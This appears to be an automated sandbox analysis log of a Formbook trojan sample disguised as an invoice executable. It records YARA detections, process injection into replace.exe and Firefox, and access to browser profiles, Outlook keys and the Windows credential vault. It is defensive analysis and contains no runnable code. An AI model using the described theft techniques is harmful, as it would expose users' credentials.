            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0368B1B05_2_0368B1B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_037401AA5_2_037401AA
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0373F0E05_2_0373F0E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_037370E95_2_037370E9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036870C05_2_036870C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0372F0CC5_2_0372F0CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036807705_2_03680770
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036A47505_2_036A4750
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0367C7C05_2_0367C7C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0373F7B05_2_0373F7B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0369C6E05_2_0369C6E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_037316CC5_2_037316CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_037375715_2_03737571
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036805355_2_03680535
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0371D5B05_2_0371D5B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_037405915_2_03740591
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036714605_2_03671460
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_037324465_2_03732446
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0373F43F5_2_0373F43F
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0372E4F65_2_0372E4F6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0373FB765_2_0373FB76
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0373AB405_2_0373AB40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036BDBF95_2_036BDBF9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036F5BF05_2_036F5BF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03736BD75_2_03736BD7
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0369FB805_2_0369FB80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036F3A6C5_2_036F3A6C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03737A465_2_03737A46
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0373FA495_2_0373FA49
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0372DAC65_2_0372DAC6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036C5AA05_2_036C5AA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0371DAAC5_2_0371DAAC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0367EA805_2_0367EA80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036969625_2_03696962
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036899505_2_03689950
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0369B9505_2_0369B950
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036829A05_2_036829A0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0374A9A65_2_0374A9A6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036828405_2_03682840
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0368A8405_2_0368A840
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036ED8005_2_036ED800
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036838E05_2_036838E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036AE8F05_2_036AE8F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036668B85_2_036668B8
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036F4F405_2_036F4F40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036C2F285_2_036C2F28
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036A0F305_2_036A0F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0373FF095_2_0373FF09
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03672FC85_2_03672FC8
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0373FFB15_2_0373FFB1
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03681F925_2_03681F92
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03680E595_2_03680E59
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0373EE265_2_0373EE26
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0373EEDB5_2_0373EEDB
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03689EB05_2_03689EB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0373CE935_2_0373CE93
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03692E905_2_03692E90
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03737D735_2_03737D73
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03683D405_2_03683D40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03731D5A5_2_03731D5A
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0368AD005_2_0368AD00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0367ADE05_2_0367ADE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0369FDC05_2_0369FDC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03698DBF5_2_03698DBF
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_036F9C325_2_036F9C32
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03680C005_2_03680C00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_0373FCF25_2_0373FCF2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03670CF25_2_03670CF2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_03720CB55_2_03720CB5
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E116D05_2_00E116D0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E2A1E05_2_00E2A1E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E1322B5_2_00E1322B
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E132305_2_00E13230
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E0C8875_2_00E0C887
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E0C8905_2_00E0C890
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E0CAB05_2_00E0CAB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E0AB305_2_00E0AB30
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: String function: 01035130 appears 57 times
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: String function: 00FEB970 appears 257 times
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: String function: 0106EA12 appears 86 times
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: String function: 0107F290 appears 103 times
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: String function: 01047E54 appears 97 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 0366B970 appears 250 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 036C7E54 appears 88 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 036FF290 appears 103 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 036EEA12 appears 86 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 036B5130 appears 36 times
            Source: HYCO_Invoices MS2 & MS3.exeStatic PE information: invalid certificate
            Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1634176335.0000000006650000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1631539091.00000000032F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1633542425.0000000005B10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1630781285.000000000137E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1631539091.000000000334A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSimpleLogin.dll8 vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000000.00000002.1632421765.00000000044CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREPLACE.EXEj% vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameREPLACE.EXEj% vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897881775.00000000010ED000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exeBinary or memory string: OriginalFilenametHve.exe4 vs HYCO_Invoices MS2 & MS3.exe
            Source: HYCO_Invoices MS2 & MS3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.HYCO_Invoices MS2 & MS3.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1897785067.0000000000EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2890705749.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1897325646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2889601685.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2892203666.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2890660634.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2890477730.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1898787100.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: HYCO_Invoices MS2 & MS3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, SSYGWfDca6ipkM6C75.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, SSYGWfDca6ipkM6C75.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xUidB8gG139RXqKEpj.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xUidB8gG139RXqKEpj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.46f3050.10.raw.unpack, xUidB8gG139RXqKEpj.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xUidB8gG139RXqKEpj.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xUidB8gG139RXqKEpj.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, xUidB8gG139RXqKEpj.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.6650000.15.raw.unpack, SSYGWfDca6ipkM6C75.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/2@7/6
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HYCO_Invoices MS2 & MS3.exe.logJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeMutant created: NULL
            Source: C:\Windows\SysWOW64\replace.exeFile created: C:\Users\user\AppData\Local\Temp\C3vB7APKJump to behavior
            Source: HYCO_Invoices MS2 & MS3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: HYCO_Invoices MS2 & MS3.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: replace.exe, 00000005.00000003.2088920007.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000005.00000002.2889773857.00000000030F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: HYCO_Invoices MS2 & MS3.exeReversingLabs: Detection: 47%
            Source: HYCO_Invoices MS2 & MS3.exeVirustotal: Detection: 40%
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeFile read: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe:Zone.IdentifierJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"Jump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess created: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe "C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe"Jump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\EpxtdbMlDNWVwQORrQnqREWFbXWUOvoLyAdbyLeGkNkao\JlRhrxMCYjuGzWWvXkXNzhLX.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: HYCO_Invoices MS2 & MS3.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: HYCO_Invoices MS2 & MS3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: replace.pdb source: HYCO_Invoices MS2 & MS3.exe, 00000002.00000002.1897552189.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000002.2889962629.0000000001338000.00000004.00000020.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000004.00000003.2173314297.000000000134B000.00000004.00000020.00020000.00000000.sdmp
